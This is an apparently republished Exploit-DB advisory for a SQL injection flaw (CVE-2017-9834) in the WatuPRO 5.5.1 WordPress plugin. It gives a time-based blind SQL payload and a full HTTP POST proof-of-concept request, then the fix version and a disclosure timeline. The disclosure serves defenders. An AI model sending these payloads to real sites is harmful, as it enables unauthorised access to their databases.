WordPress Plugin WatuPRO 5.5.1 – SQL Injection

• Exploit Database
• 16 阅读

• 作者： Manich Koomsusi
  日期： 2017-07-03
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/42291/

• #####################################
  Exploit Title: SQL Injection In WatuPRO (WordPress Plugin to Create Exams, Tests and Quizzes)
  Exploit Author: ManichKoomsusi
  Date: 03-07-2017
  Software: WatuPRO
  Version: 5.5.1
  Website: http://calendarscripts.info/watupro/
  Tested on: WordPress 4.7.5
  Software Link: https://1drv.ms/u/s!AhfkvGaDTn1bmgHSj9u_jQX8iME0
  CVE: CVE-2017-9834
  #####################################
  
  Description
  ==================================
  SQL Injection in WatuPRO WordPress Plugin for create exams, Tests and Quizzes allow the attacker dump the database contents.
  
  Vulnerability
  ==================================
  This plugin sending quizzes to the server with “watupro_questions” parameter not sanitize before take SQL statement.
  
  Proof of concept
  ==================================
  Take exams or quizzes and submit to the server in POST method
  
  Payload : “1:1,2) AND 4761=IF((41=41),SLEEP(5),4761) AND (4547=4547”the server delay response time around ~5 second.
  Payload : “1:1,2) AND 4761=IF((41=41),SLEEP(0),4761) AND (4547=4547”the server not delay response time.
  
  ############
  POST /pt/wordpress/wp-admin/admin-ajax.php HTTP/1.1
  Content-Length: 292
  Accept-Language: en-US,en;q=0.5
  Host: 192.168.5.189
  Accept: text/plain, */*; q=0.01
  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:54.0) Gecko/20100101 Firefox/54.0
  DNT: 1
  Connection: close
  X-Requested-With: XMLHttpRequest
  Referer: http://192.168.5.189/pt/wordpress/
  Cookie: wordpress_155e4542aeb2c66021dab6903e684bdb=admin%7C1497811093%7CaY85tN6gH7x8iYCzPETIcEJYYyn6tZlzJnbhTZLgZYX%7C475cf68a551a0db99cd991e958fc949bfe8f2a833bf39d0534ce25d29c11a9b8; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_155e4542aeb2c66021dab6903e684bdb=admin%7C1497811093%7CaY85tN6gH7x8iYCzPETIcEJYYyn6tZlzJnbhTZLgZYX%7C61ef1ea8c998118da9dd01d5f650dc0806f8bfbb1d5f28fdbb626f062bcebbcd; wp-settings-time-1=1497748191; PHPSESSID=rh7v9qt9ibdlioth3cecr5gg94
  Content-Type: application/x-www-form-urlencoded
  action=watupro_submit&quiz_id=1&question_id%5B%5D=1&watupro_questions=1:1,2)%20AND%204761%3dIF((41%3d41),SLEEP(5),4761)%20AND%20(4547%3d4547&post_id=5&answer-1%5B%5D=1&question_1_hints=&taker_email=hacker%40admin.com<http://40admin.com>&h_app_id=0.24749700+1497748201&start_time=2017-06-18+01%3A10%3A01&in_ajax=1
  #############
  
  
  Mitigations
  ==================================
  Upgrade to version 5.5.3.7 or later.
  
  Timeline
  ==================================
  2017-06-19: Discovered the bug
  2017-06-19: Reported to vendor
  2017-06-19: First response from vendor saying software it fixed. But the vendor fix not properly
  2017-06-20: Version 5.5.3.7 released “Fixed issue with input validate.”
  2017-07-03: Advisory published
  
  Discovered By:
  =====================
  ManichKoomsusi